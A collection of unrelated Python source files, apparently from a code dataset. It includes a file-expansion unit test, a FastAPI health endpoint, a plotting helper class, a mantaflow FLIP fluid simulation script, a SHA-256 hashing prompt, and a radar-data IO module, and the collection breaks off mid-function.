                self.assertSequenceEqual(file_list, ["a", "b"])
                file_list = list(expand_file_iter(["b", "D/c"]))
                self.assertSequenceEqual(file_list, ["b", "D/c"])

                # "*" expands to top-level files only; "**" recurses into D.
                file_list = list(expand_file_iter(["*"]))
                self.assertSequenceEqual(sorted(file_list), sorted(["a", "b"]))
                file_list = list(expand_file_iter(["**"]))
                self.assertSequenceEqual(sorted(file_list), sorted(["a", "b", os.path.join("D", "c")]))

                # "-" reads file names from stdin; a plain list stands in for
                # the stream (assumes expand_file_iter only iterates
                # sys.stdin line by line -- TODO confirm).
                sys_stdin = sys.stdin
                try:
                    sys.stdin = ["a", "D/c"]
                    file_list = list(expand_file_iter(["-"]))
                    self.assertSequenceEqual(file_list, ["a", "D/c"])
                finally:
                    sys.stdin = sys_stdin
# Run the tests when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
| 2,790 | 970 |
class NoCongressApiKeyException(Exception):
    """Raised when no Congress API key has been provided."""
| 108 | 30 |
from typing import Union
from fastapi import Depends
from fastapi.responses import JSONResponse
from sqlalchemy.orm import Session
from authorization import get_all_roles
from server import app, get_db
from settings import settings
from models import HealthCheck
@app.get('/health', tags=['system'], response_model=HealthCheck, response_model_exclude_none=True)
async def health_check(db: Session = Depends(get_db)):
    """Report server and database health.

    Returns the health payload with HTTP 200 when the database probe
    succeeds, or the same payload plus ``database_error`` with HTTP 500
    when it fails.
    """
    status = {
        'version': settings.server_version,
        'server': True,
        'database': True
    }
    try:
        # Cheap connectivity probe against the session.
        db.execute('SELECT 1')
    except Exception as err:
        status['database'] = False
        status['database_error'] = str(err)
        # Bug fix: the 500 response used to be returned unconditionally,
        # so the endpoint reported failure even when the probe succeeded
        # and the trailing `return status` was unreachable.
        return JSONResponse(
            status_code=500,
            content=status,
        )
    return status
| 832 | 231 |
from .factal import *
from .schema import * | 43 | 13 |
# SecretPlots
# Copyright (c) 2019. SecretBiology
#
# Author: Rohit Suratekar
# Organisation: SecretBiology
# Website: https://github.com/secretBiology/SecretPlots
# Licence: MIT License
# Creation: 05/10/19, 7:52 PM
#
# All Location Managers will go here
from SecretPlots.managers._axis import AxisManager
from SecretPlots.managers._object import ObjectManager
from SecretPlots.objects import Data
from SecretPlots.utils import Log
class LocationManager:
    """Base class for location managers.

    Wraps an AxisManager/ObjectManager pair and exposes a lazily initialised
    (major, minor) coordinate pair seeded from ``start_point``.  Subclasses
    must implement ``plot_type``, ``validate`` and ``get``.
    """

    def __init__(self, am: AxisManager, om: ObjectManager, log: Log):
        self.am = am
        self.om = om
        self.start_point = (0, 0)
        self._log = log
        self._major = None
        self._minor = None

    @property
    def width(self):
        """Object width, delegated to the ObjectManager."""
        return self.om.width

    @property
    def height(self):
        """Object height, delegated to the ObjectManager."""
        return self.om.height

    @property
    def major_gap(self):
        """Gap along the major axis, delegated to the AxisManager."""
        return self.am.major.gap

    @property
    def minor_gap(self):
        """Gap along the minor axis, delegated to the AxisManager."""
        return self.am.minor.gap

    @property
    def plot_type(self):
        """Plot-type identifier; subclasses must override."""
        raise NotImplementedError

    @property
    def major(self):
        """Major coordinate, seeded from start_point on first access."""
        if self._major is None:
            self._major, self._minor = self.start_point
        return self._major

    @property
    def minor(self):
        """Minor coordinate, seeded from start_point on first access."""
        if self._minor is None:
            self._major, self._minor = self.start_point
        return self._minor

    def validate(self, data: Data):
        """Validate input data; subclasses must override."""
        raise NotImplementedError

    def get(self, data: Data):
        """Compute locations for *data*; subclasses must override."""
        raise NotImplementedError
| 1,482 | 475 |
#
# This FLIP example combines narrow band flip, 2nd order wall boundary conditions, and
# adaptive time stepping.
#
from manta import *

# Domain setup: 3-D by default; a 2-D run collapses the z-axis to one cell.
dim = 3
res = 64
#res = 124
gs = vec3(res,res,res)
if (dim==2):
    gs.z=1
s = Solver(name='main', gridSize = gs, dim=dim)

# Narrow-band width (in cells) around the surface in which particles are kept.
narrowBand = 3
minParticles = pow(2,dim)  # resampling target: 2^dim particles per cell
saveParts = False
frames = 200

# Adaptive time stepping
s.frameLength = 0.8   # length of one frame (in "world time")
s.cfl = 3.0           # maximal velocity per cell and timestep, 3 is fairly strict
s.timestep = s.frameLength
s.timestepMin = s.frameLength / 4.  # time step range
s.timestepMax = s.frameLength * 4.

# prepare grids and particles
flags = s.create(FlagGrid)
phi = s.create(LevelsetGrid)
phiParts = s.create(LevelsetGrid)
phiObs = s.create(LevelsetGrid)
vel = s.create(MACGrid)
velOld = s.create(MACGrid)
velParts = s.create(MACGrid)
#mapWeights= s.create(MACGrid)
pressure = s.create(RealGrid)
fractions = s.create(MACGrid)  # per-face fluid fractions for 2nd-order walls
tmpVec3 = s.create(VecGrid)

pp = s.create(BasicParticleSystem)
pVel = pp.create(PdataVec3)
mesh = s.create(Mesh)

# acceleration data for particle nbs
pindex = s.create(ParticleIndexSystem)
gpi = s.create(IntGrid)

# scene setup
bWidth=1
flags.initDomain(boundaryWidth=bWidth, phiWalls=phiObs )
fluidVel = 0
fluidSetVel = 0
phi.setConst(999.)

# standing dam
fluidbox1 = Box( parent=s, p0=gs*vec3(0,0,0), p1=gs*vec3(1.0,0.3,1))
phi.join( fluidbox1.computeLevelset() )
fluidbox2 = Box( parent=s, p0=gs*vec3(0.1,0,0), p1=gs*vec3(0.2,0.75,1))
phi.join( fluidbox2.computeLevelset() )

# spherical obstacle in the middle of the domain
if 1:
    sphere = Sphere( parent=s , center=gs*vec3(0.66,0.3,0.5), radius=res*0.2)
    phiObs.join( sphere.computeLevelset() )
    #obsbox = Box( parent=s, p0=gs*vec3(0.4,0.2,0), p1=gs*vec3(0.7,0.4,1))
    #obsbox = Box( parent=s, p0=gs*vec3(0.3,0.2,0), p1=gs*vec3(0.7,0.6,1))
    #phiObs.join( obsbox.computeLevelset() )

flags.updateFromLevelset(phi)
phi.subtract( phiObs );
sampleLevelsetWithParticles( phi=phi, flags=flags, parts=pp, discretization=2, randomness=0.05 )

if fluidVel!=0:
    # set initial velocity
    fluidVel.applyToGrid( grid=vel , value=fluidSetVel )
    mapGridToPartsVec3(source=vel, parts=pp, target=pVel )

# also sets boundary flags for phiObs
updateFractions( flags=flags, phiObs=phiObs, fractions=fractions, boundaryWidth=bWidth )
setObstacleFlags(flags=flags, phiObs=phiObs, fractions=fractions)

lastFrame = -1
if 1 and (GUI):
    gui = Gui()
    gui.show()
    #gui.pause()

# save reference any grid, to automatically determine grid size
if saveParts:
    pressure.save( 'ref_flipParts_0000.uni' );

#main loop
while s.frame < frames:
    maxVel = vel.getMax()
    s.adaptTimestep( maxVel )  # CFL-based step within [timestepMin, timestepMax]
    mantaMsg('\nFrame %i, time-step size %f' % (s.frame, s.timestep))

    # FLIP
    pp.advectInGrid(flags=flags, vel=vel, integrationMode=IntRK4, deleteInObstacle=False, stopInObstacle=False )
    pushOutofObs( parts=pp, flags=flags, phiObs=phiObs )

    advectSemiLagrange(flags=flags, vel=vel, grid=phi, order=1) # first order is usually enough
    advectSemiLagrange(flags=flags, vel=vel, grid=vel, order=2)

    # create level set of particles
    gridParticleIndex( parts=pp , flags=flags, indexSys=pindex, index=gpi )
    unionParticleLevelset( pp, pindex, flags, gpi, phiParts )

    # combine level set of particles with grid level set
    phi.addConst(1.); # shrink slightly
    phi.join( phiParts );
    extrapolateLsSimple(phi=phi, distance=narrowBand+2, inside=True )
    extrapolateLsSimple(phi=phi, distance=3 )
    phi.setBoundNeumann(0) # make sure no particles are placed at outer boundary, warning - larger values can delete thin sheets at outer walls...
    flags.updateFromLevelset(phi)

    # combine particles velocities with advected grid velocities
    mapPartsToMAC(vel=velParts, flags=flags, velOld=velOld, parts=pp, partVel=pVel, weight=tmpVec3)
    extrapolateMACFromWeight( vel=velParts , distance=2, weight=tmpVec3 )
    combineGridVel(vel=velParts, weight=tmpVec3 , combineVel=vel, phi=phi, narrowBand=(narrowBand-1), thresh=0)
    velOld.copyFrom(vel)

    # forces & pressure solve
    addGravity(flags=flags, vel=vel, gravity=(0,-0.001,0))
    extrapolateMACSimple( flags=flags, vel=vel , distance=2, intoObs=True )
    setWallBcs(flags=flags, vel=vel, fractions=fractions, phiObs=phiObs)
    solvePressure(flags=flags, vel=vel, pressure=pressure, phi=phi, fractions=fractions )
    extrapolateMACSimple( flags=flags, vel=vel , distance=4, intoObs=True )
    setWallBcs(flags=flags, vel=vel, fractions=fractions, phiObs=phiObs)

    if (dim==3):
        # mis-use phiParts as temp grid to close the mesh
        phiParts.copyFrom(phi)
        phiParts.setBound(0.5,0)
        phiParts.createMesh(mesh)

    # set source grids for resampling, used in adjustNumber!
    pVel.setSource( vel, isMAC=True )
    adjustNumber( parts=pp, vel=vel, flags=flags, minParticles=1*minParticles, maxParticles=2*minParticles, phi=phi, exclude=phiObs, narrowBand=narrowBand )
    flipVelocityUpdate(vel=vel, velOld=velOld, flags=flags, parts=pp, partVel=pVel, flipRatio=0.97 )

    s.step()

    if (lastFrame!=s.frame):
        # generate data for flip03_gen.py surface generation scene
        if saveParts:
            pp.save( 'flipParts_%04d.uni' % s.frame );
        if 0 and (GUI):
            gui.screenshot( 'flip06_%04d.png' % s.frame );
        #s.printMemInfo()
        lastFrame = s.frame;
| 5,279 | 2,175 |
"""Prompt for a key and a message, then print a keyed SHA-256 digest."""
import hashlib

# Gather the key and the message interactively.  input() already returns a
# str, so the original str(...) wrappers were redundant.
key = input("KEY>>> ")
password = input("MESSAGE>>> ")

# Sandwich the message between two copies of the key as a crude salt.
# NOTE(review): this is NOT a real HMAC; for anything security-sensitive use
# hmac.new(key, message, "sha256") instead.
password = (key + password + key).encode("utf-8")
print(password)  # echo the exact bytes being hashed (matches original output)

# hashlib.sha256() is the direct constructor behind hashlib.new("sha256").
print(hashlib.sha256(password).hexdigest())
| 369 | 136 |
"""IO methods for radar data from MYRORSS or MRMS.
MYRORSS = Multi-year Reanalysis of Remotely Sensed Storms
MRMS = Multi-radar Multi-sensor
"""
import os
import glob
import warnings
import numpy
import pandas
from netCDF4 import Dataset
from gewittergefahr.gg_io import netcdf_io
from gewittergefahr.gg_utils import number_rounding as rounder
from gewittergefahr.gg_utils import time_conversion
from gewittergefahr.gg_utils import time_periods
from gewittergefahr.gg_utils import longitude_conversion as lng_conversion
from gewittergefahr.gg_utils import grids
from gewittergefahr.gg_utils import radar_utils
from gewittergefahr.gg_utils import myrorss_and_mrms_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
# Column names used in the raw (MYRORSS/MRMS) sparse-grid NetCDF files.
NW_GRID_POINT_LAT_COLUMN_ORIG = 'Latitude'
NW_GRID_POINT_LNG_COLUMN_ORIG = 'Longitude'
LAT_SPACING_COLUMN_ORIG = 'LatGridSpacing'
LNG_SPACING_COLUMN_ORIG = 'LonGridSpacing'
NUM_LAT_COLUMN_ORIG = 'Lat'
NUM_LNG_COLUMN_ORIG = 'Lon'
NUM_PIXELS_COLUMN_ORIG = 'pixel'
HEIGHT_COLUMN_ORIG = 'Height'
UNIX_TIME_COLUMN_ORIG = 'Time'
FIELD_NAME_COLUMN_ORIG = 'TypeName'
SENTINEL_VALUE_COLUMNS_ORIG = ['MissingData', 'RangeFolded']

# Corresponding GewitterGefahr column names (and their raw-file equivalents).
GRID_ROW_COLUMN = 'grid_row'
GRID_COLUMN_COLUMN = 'grid_column'
NUM_GRID_CELL_COLUMN = 'num_grid_cells'
GRID_ROW_COLUMN_ORIG = 'pixel_x'
GRID_COLUMN_COLUMN_ORIG = 'pixel_y'
NUM_GRID_CELL_COLUMN_ORIG = 'pixel_count'

# strftime patterns used in file names and log messages.
TIME_FORMAT_SECONDS = '%Y%m%d-%H%M%S'
TIME_FORMAT_MINUTES = '%Y%m%d-%H%M'
TIME_FORMAT_FOR_LOG_MESSAGES = '%Y-%m-%d-%H%M%S'

# Character-class pattern matching a TIME_FORMAT_SECONDS string (usable in
# glob patterns, since it contains only bracket expressions).
TIME_FORMAT_SECONDS_REGEX = (
    '[0-9][0-9][0-9][0-9][0-1][0-9][0-3][0-9]-[0-2][0-9][0-5][0-9][0-5][0-9]')

# Unit conversions and numeric tolerances.
MINUTES_TO_SECONDS = 60
METRES_TO_KM = 1e-3
SENTINEL_TOLERANCE = 10.  # abs tolerance when matching sentinel values
LATLNG_MULTIPLE_DEG = 1e-4

# Default max offsets (seconds) between desired and actual file times.
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC = 240
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC = 180

# Raw files may be gzipped NetCDF or plain NetCDF.
ZIPPED_FILE_EXTENSION = '.gz'
UNZIPPED_FILE_EXTENSION = '.netcdf'

AZIMUTHAL_SHEAR_FIELD_NAMES = [
    radar_utils.LOW_LEVEL_SHEAR_NAME, radar_utils.MID_LEVEL_SHEAR_NAME]

# Keys of the dictionary returned by find_many_raw_files.
RADAR_FILE_NAMES_KEY = 'radar_file_name_matrix'
UNIQUE_TIMES_KEY = 'unique_times_unix_sec'
SPC_DATES_AT_UNIQUE_TIMES_KEY = 'spc_dates_at_unique_times_unix_sec'
FIELD_NAME_BY_PAIR_KEY = 'field_name_by_pair'
HEIGHT_BY_PAIR_KEY = 'height_by_pair_m_asl'
def _get_pathless_raw_file_pattern(unix_time_sec):
    """Generates glob pattern for pathless name of raw file.

    The time step is truncated to the minute, and the pattern matches both
    zipped and unzipped files.  This is the "pattern" counterpart of
    `_get_pathless_raw_file_name`, meant for input to `glob.glob`.

    :param unix_time_sec: Valid time.
    :return: pathless_raw_file_pattern: Pathless glob pattern for raw file.
    """
    minute_string = time_conversion.unix_sec_to_string(
        unix_time_sec, TIME_FORMAT_MINUTES)
    return '{0:s}*{1:s}*'.format(minute_string, UNZIPPED_FILE_EXTENSION)
def _get_pathless_raw_file_name(unix_time_sec, zipped=True):
    """Generates pathless name for raw file.

    :param unix_time_sec: Valid time.
    :param zipped: Boolean flag.  If True, will generate name for zipped file.
        If False, will generate name for unzipped file.
    :return: pathless_raw_file_name: Pathless name for raw file.
    """
    time_string = time_conversion.unix_sec_to_string(
        unix_time_sec, TIME_FORMAT_SECONDS)
    pathless_raw_file_name = time_string + UNZIPPED_FILE_EXTENSION
    if zipped:
        pathless_raw_file_name += ZIPPED_FILE_EXTENSION
    return pathless_raw_file_name
def _remove_sentinels_from_sparse_grid(
        sparse_grid_table, field_name, sentinel_values):
    """Removes sentinel values from sparse grid.

    :param sparse_grid_table: pandas DataFrame with columns produced by
        `read_data_from_sparse_grid_file`.
    :param field_name: Name of radar field in GewitterGefahr format.
    :param sentinel_values: 1-D numpy array of sentinel values.
    :return: sparse_grid_table: Same as input, except that rows with a sentinel
        value are removed.
    """
    field_values = sparse_grid_table[field_name].values
    sentinel_flags = numpy.zeros(len(sparse_grid_table.index), dtype=bool)

    # A value counts as a sentinel if it is within SENTINEL_TOLERANCE of any
    # known sentinel.
    for this_sentinel_value in sentinel_values:
        sentinel_flags = numpy.logical_or(
            sentinel_flags,
            numpy.isclose(
                field_values, this_sentinel_value, atol=SENTINEL_TOLERANCE)
        )

    rows_to_drop = sparse_grid_table.index[numpy.where(sentinel_flags)[0]]
    return sparse_grid_table.drop(rows_to_drop, axis=0, inplace=False)
def _remove_sentinels_from_full_grid(field_matrix, sentinel_values):
    """Removes sentinel values from full grid.

    M = number of rows (unique grid-point latitudes)
    N = number of columns (unique grid-point longitudes)

    NOTE: the NaN assignment goes through a reshaped view, so the input array
    is modified in place as well (assumes a float dtype -- TODO confirm).

    :param field_matrix: M-by-N numpy array with radar field.
    :param sentinel_values: 1-D numpy array of sentinel values.
    :return: field_matrix: Same as input, except that sentinel values are
        replaced with NaN.
    """
    num_grid_rows, num_grid_columns = field_matrix.shape
    flat_field_values = numpy.reshape(
        field_matrix, num_grid_rows * num_grid_columns)

    sentinel_flags = numpy.zeros(flat_field_values.size, dtype=bool)
    for this_sentinel_value in sentinel_values:
        sentinel_flags = numpy.logical_or(
            sentinel_flags,
            numpy.isclose(
                flat_field_values, this_sentinel_value,
                atol=SENTINEL_TOLERANCE)
        )

    flat_field_values[numpy.where(sentinel_flags)[0]] = numpy.nan
    return numpy.reshape(
        flat_field_values, (num_grid_rows, num_grid_columns))
def get_relative_dir_for_raw_files(field_name, data_source, height_m_asl=None):
    """Generates relative path for raw files.

    :param field_name: Name of radar field in GewitterGefahr format.
    :param data_source: Data source (string).
    :param height_m_asl: Radar height (metres above sea level).  Used only for
        reflectivity; other fields have a single valid height per source.
    :return: relative_directory_name: Relative path for raw files.
    """
    if field_name == radar_utils.REFL_NAME:
        # Reflectivity is stored at many heights; validate the one given.
        radar_utils.check_heights(
            data_source=data_source,
            heights_m_asl=numpy.array([height_m_asl]),
            field_name=radar_utils.REFL_NAME)
    else:
        # Other fields have exactly one valid height; ignore the argument.
        height_m_asl = radar_utils.get_valid_heights(
            data_source=data_source, field_name=field_name)[0]

    orig_field_name = radar_utils.field_name_new_to_orig(
        field_name=field_name, data_source_name=data_source)
    return '{0:s}/{1:05.2f}'.format(
        orig_field_name, float(height_m_asl) * METRES_TO_KM)
def find_raw_file(
        unix_time_sec, spc_date_string, field_name, data_source,
        top_directory_name, height_m_asl=None, raise_error_if_missing=True):
    """Finds raw file.

    File should contain one field at one time step (e.g., MESH at 123502 UTC,
    reflectivity at 500 m above sea level and 123502 UTC).

    :param unix_time_sec: Valid time.
    :param spc_date_string: SPC date (format "yyyymmdd").
    :param field_name: Name of radar field in GewitterGefahr format.
    :param data_source: Data source (string).
    :param top_directory_name: Name of top-level directory with raw files.
    :param height_m_asl: Radar height (metres above sea level).
    :param raise_error_if_missing: Boolean flag.  If True and file is missing,
        this method will raise an error.  If False and file is missing, will
        return *expected* path to raw file.
    :return: raw_file_name: Path to raw file.
    :raises: ValueError: if raise_error_if_missing = True and file is missing.
    """
    # Error-checking.
    _ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
    error_checking.assert_is_string(top_directory_name)
    error_checking.assert_is_boolean(raise_error_if_missing)

    relative_directory_name = get_relative_dir_for_raw_files(
        field_name=field_name, height_m_asl=height_m_asl,
        data_source=data_source)

    # Layout: <top>/<yyyy>/<yyyymmdd>/<field>/<height>/<time>.netcdf[.gz]
    directory_name = '{0:s}/{1:s}/{2:s}/{3:s}'.format(
        top_directory_name, spc_date_string[:4], spc_date_string,
        relative_directory_name
    )
    pathless_file_name = _get_pathless_raw_file_name(unix_time_sec, zipped=True)
    raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)

    # If the zipped file is missing, fall back to the unzipped name.  NOTE:
    # the fallback (and the existence check) runs only when
    # raise_error_if_missing=True; with the flag False the zipped path is
    # returned without checking the file system, as callers such as
    # find_raw_files_one_spc_date rely on getting the zipped name back.
    if raise_error_if_missing and not os.path.isfile(raw_file_name):
        pathless_file_name = _get_pathless_raw_file_name(
            unix_time_sec, zipped=False)
        raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)

    if raise_error_if_missing and not os.path.isfile(raw_file_name):
        raise ValueError(
            'Cannot find raw file. Expected at: "{0:s}"'.format(raw_file_name)
        )

    return raw_file_name
def raw_file_name_to_time(raw_file_name):
    """Parses time from file name.

    :param raw_file_name: Path to raw file.
    :return: unix_time_sec: Valid time.
    """
    error_checking.assert_is_string(raw_file_name)

    pathless_file_name = os.path.split(raw_file_name)[-1]
    time_string = pathless_file_name.replace(ZIPPED_FILE_EXTENSION, '')
    time_string = time_string.replace(UNZIPPED_FILE_EXTENSION, '')
    return time_conversion.string_to_unix_sec(time_string, TIME_FORMAT_SECONDS)
def find_raw_file_inexact_time(
        desired_time_unix_sec, spc_date_string, field_name, data_source,
        top_directory_name, height_m_asl=None, max_time_offset_sec=None,
        raise_error_if_missing=False):
    """Finds raw file at inexact time.

    If you know the exact valid time, use `find_raw_file`.

    :param desired_time_unix_sec: Desired valid time.
    :param spc_date_string: SPC date (format "yyyymmdd").
    :param field_name: Field name in GewitterGefahr format.
    :param data_source: Data source (string).
    :param top_directory_name: Name of top-level directory with raw files.
    :param height_m_asl: Radar height (metres above sea level).
    :param max_time_offset_sec: Maximum offset between actual and desired valid
        time.  If None, defaults to `DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC`
        for azimuthal-shear fields and
        `DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC` for all other fields.
    :param raise_error_if_missing: Boolean flag.  If no file is found and
        raise_error_if_missing = True, this method will error out.  If no file
        is found and raise_error_if_missing = False, will return None.
    :return: raw_file_name: Path to raw file.
    :raises: ValueError: if no file is found and raise_error_if_missing = True.
    """
    # Error-checking.
    error_checking.assert_is_integer(desired_time_unix_sec)
    _ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
    error_checking.assert_is_boolean(raise_error_if_missing)
    radar_utils.check_field_name(field_name)

    if max_time_offset_sec is None:
        if field_name in AZIMUTHAL_SHEAR_FIELD_NAMES:
            max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC
        else:
            max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC

    error_checking.assert_is_integer(max_time_offset_sec)
    error_checking.assert_is_greater(max_time_offset_sec, 0)

    # Snap the search window to whole minutes, since raw files are binned by
    # minute.  NOTE(review): numpy.round around int(...) is a no-op, and the
    # upper bound also uses floor_to_nearest (not a ceiling) -- confirm the
    # window is intended to be floor-aligned at both ends.
    first_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
        float(desired_time_unix_sec - max_time_offset_sec),
        MINUTES_TO_SECONDS)))
    last_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
        float(desired_time_unix_sec + max_time_offset_sec),
        MINUTES_TO_SECONDS)))

    allowed_minutes_unix_sec = time_periods.range_and_interval_to_list(
        start_time_unix_sec=first_allowed_minute_unix_sec,
        end_time_unix_sec=last_allowed_minute_unix_sec,
        time_interval_sec=MINUTES_TO_SECONDS, include_endpoint=True).astype(int)

    relative_directory_name = get_relative_dir_for_raw_files(
        field_name=field_name, data_source=data_source,
        height_m_asl=height_m_asl)

    # Glob every allowed minute for candidate files.
    raw_file_names = []
    for this_time_unix_sec in allowed_minutes_unix_sec:
        this_pathless_file_pattern = _get_pathless_raw_file_pattern(
            this_time_unix_sec)
        this_file_pattern = '{0:s}/{1:s}/{2:s}/{3:s}/{4:s}'.format(
            top_directory_name, spc_date_string[:4], spc_date_string,
            relative_directory_name, this_pathless_file_pattern
        )
        raw_file_names += glob.glob(this_file_pattern)

    # Pick the candidate whose parsed time is closest to the desired time.
    file_times_unix_sec = []
    for this_raw_file_name in raw_file_names:
        file_times_unix_sec.append(raw_file_name_to_time(this_raw_file_name))

    if len(file_times_unix_sec):
        file_times_unix_sec = numpy.array(file_times_unix_sec)
        time_differences_sec = numpy.absolute(
            file_times_unix_sec - desired_time_unix_sec)
        nearest_index = numpy.argmin(time_differences_sec)
        min_time_diff_sec = time_differences_sec[nearest_index]
    else:
        min_time_diff_sec = numpy.inf

    if min_time_diff_sec > max_time_offset_sec:
        if raise_error_if_missing:
            desired_time_string = time_conversion.unix_sec_to_string(
                desired_time_unix_sec, TIME_FORMAT_FOR_LOG_MESSAGES)
            error_string = (
                'Could not find "{0:s}" file within {1:d} seconds of {2:s}.'
            ).format(field_name, max_time_offset_sec, desired_time_string)
            raise ValueError(error_string)

        return None

    # nearest_index is always bound here: reaching this line requires
    # min_time_diff_sec <= max_time_offset_sec, i.e. files were found.
    return raw_file_names[nearest_index]
def find_raw_files_one_spc_date(
        spc_date_string, field_name, data_source, top_directory_name,
        height_m_asl=None, raise_error_if_missing=True):
    """Finds raw files for one field and one SPC date.

    :param spc_date_string: SPC date (format "yyyymmdd").
    :param field_name: Name of radar field in GewitterGefahr format.
    :param data_source: Data source (string).
    :param top_directory_name: Name of top-level directory with raw files.
    :param height_m_asl: Radar height (metres above sea level).
    :param raise_error_if_missing: Boolean flag.  If True and no files are
        found, will raise error.
    :return: raw_file_names: 1-D list of paths to raw files.
    :raises: ValueError: if raise_error_if_missing = True and no files are
        found.
    """
    error_checking.assert_is_boolean(raise_error_if_missing)

    # Build the expected (zipped) file name for an arbitrary time on this
    # date, then widen its time part into a character-class pattern and its
    # ".gz" suffix into a wildcard so glob matches every time step, zipped
    # or not.
    example_time_unix_sec = time_conversion.spc_date_string_to_unix_sec(
        spc_date_string)
    example_file_name = find_raw_file(
        unix_time_sec=example_time_unix_sec, spc_date_string=spc_date_string,
        field_name=field_name, data_source=data_source,
        top_directory_name=top_directory_name, height_m_asl=height_m_asl,
        raise_error_if_missing=False)

    example_directory_name, example_pathless_file_name = os.path.split(
        example_file_name)
    example_time_string = time_conversion.unix_sec_to_string(
        example_time_unix_sec, TIME_FORMAT_SECONDS)

    pathless_file_pattern = example_pathless_file_name.replace(
        example_time_string, TIME_FORMAT_SECONDS_REGEX
    ).replace(ZIPPED_FILE_EXTENSION, '*')

    raw_file_pattern = '{0:s}/{1:s}'.format(
        example_directory_name, pathless_file_pattern)
    raw_file_names = glob.glob(raw_file_pattern)

    if raise_error_if_missing and not raw_file_names:
        raise ValueError(
            'Could not find any files with the following pattern: '
            '{0:s}'.format(raw_file_pattern)
        )

    return raw_file_names
def find_many_raw_files(
        desired_times_unix_sec, spc_date_strings, data_source, field_names,
        top_directory_name, reflectivity_heights_m_asl=None,
        max_time_offset_for_az_shear_sec=
        DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC,
        max_time_offset_for_non_shear_sec=
        DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC):
    """Finds raw file for each field/height pair and time step.

    N = number of input times
    T = number of unique input times
    F = number of field/height pairs

    :param desired_times_unix_sec: length-N numpy array with desired valid
        times.
    :param spc_date_strings: length-N list of corresponding SPC dates (format
        "yyyymmdd").
    :param data_source: Data source ("myrorss" or "mrms").
    :param field_names: 1-D list of field names.
    :param top_directory_name: Name of top-level directory with radar data from
        the given source.
    :param reflectivity_heights_m_asl: 1-D numpy array of heights (metres above
        sea level) for the field "reflectivity_dbz".  If "reflectivity_dbz" is
        not in `field_names`, leave this as None.
    :param max_time_offset_for_az_shear_sec: Max time offset (between desired
        and actual valid time) for azimuthal-shear fields.
    :param max_time_offset_for_non_shear_sec: Max time offset (between desired
        and actual valid time) for non-azimuthal-shear fields.
    :return: file_dictionary: Dictionary with the following keys.
    file_dictionary['radar_file_name_matrix']: T-by-F numpy array of paths to
        raw files.
    file_dictionary['unique_times_unix_sec']: length-T numpy array of unique
        valid times.
    file_dictionary['spc_date_strings_for_unique_times']: length-T numpy array
        of corresponding SPC dates.
    file_dictionary['field_name_by_pair']: length-F list of field names.
    file_dictionary['height_by_pair_m_asl']: length-F numpy array of heights
        (metres above sea level).
    """

    field_name_by_pair, height_by_pair_m_asl = (
        myrorss_and_mrms_utils.fields_and_refl_heights_to_pairs(
            field_names=field_names, data_source=data_source,
            refl_heights_m_asl=reflectivity_heights_m_asl)
    )

    num_fields = len(field_name_by_pair)

    error_checking.assert_is_integer_numpy_array(desired_times_unix_sec)
    error_checking.assert_is_numpy_array(
        desired_times_unix_sec, num_dimensions=1)
    num_times = len(desired_times_unix_sec)

    error_checking.assert_is_string_list(spc_date_strings)
    error_checking.assert_is_numpy_array(
        numpy.array(spc_date_strings),
        exact_dimensions=numpy.array([num_times]))

    spc_dates_unix_sec = numpy.array(
        [time_conversion.spc_date_string_to_unix_sec(s)
         for s in spc_date_strings])

    # One row per input time: [valid time, SPC date].
    time_matrix = numpy.hstack((
        numpy.reshape(desired_times_unix_sec, (num_times, 1)),
        numpy.reshape(spc_dates_unix_sec, (num_times, 1))
    ))

    # BUG FIX: the set of row-tuples is converted to a list before stacking.
    # `numpy.vstack` requires a sequence; passing a bare set was deprecated
    # in numpy 1.16 and raises an error in recent versions.
    unique_time_matrix = numpy.vstack(
        list({tuple(this_row) for this_row in time_matrix})
    ).astype(int)

    unique_times_unix_sec = unique_time_matrix[:, 0]
    spc_dates_at_unique_times_unix_sec = unique_time_matrix[:, 1]

    sort_indices = numpy.argsort(unique_times_unix_sec)
    unique_times_unix_sec = unique_times_unix_sec[sort_indices]
    spc_dates_at_unique_times_unix_sec = spc_dates_at_unique_times_unix_sec[
        sort_indices]

    num_unique_times = len(unique_times_unix_sec)
    radar_file_name_matrix = numpy.full(
        (num_unique_times, num_fields), '', dtype=object)

    for i in range(num_unique_times):
        this_spc_date_string = time_conversion.time_to_spc_date_string(
            spc_dates_at_unique_times_unix_sec[i])

        for j in range(num_fields):
            # Azimuthal-shear fields get their own time tolerance and are
            # allowed to be missing (warn only); other fields raise.
            if field_name_by_pair[j] in AZIMUTHAL_SHEAR_FIELD_NAMES:
                this_max_time_offset_sec = max_time_offset_for_az_shear_sec
                this_raise_error_flag = False
            else:
                this_max_time_offset_sec = max_time_offset_for_non_shear_sec
                this_raise_error_flag = True

            if this_max_time_offset_sec == 0:
                # Zero tolerance: require a file at the exact valid time.
                radar_file_name_matrix[i, j] = find_raw_file(
                    unix_time_sec=unique_times_unix_sec[i],
                    spc_date_string=this_spc_date_string,
                    field_name=field_name_by_pair[j], data_source=data_source,
                    top_directory_name=top_directory_name,
                    height_m_asl=height_by_pair_m_asl[j],
                    raise_error_if_missing=this_raise_error_flag)
            else:
                radar_file_name_matrix[i, j] = find_raw_file_inexact_time(
                    desired_time_unix_sec=unique_times_unix_sec[i],
                    spc_date_string=this_spc_date_string,
                    field_name=field_name_by_pair[j], data_source=data_source,
                    top_directory_name=top_directory_name,
                    height_m_asl=height_by_pair_m_asl[j],
                    max_time_offset_sec=this_max_time_offset_sec,
                    raise_error_if_missing=this_raise_error_flag)

            if radar_file_name_matrix[i, j] is None:
                this_time_string = time_conversion.unix_sec_to_string(
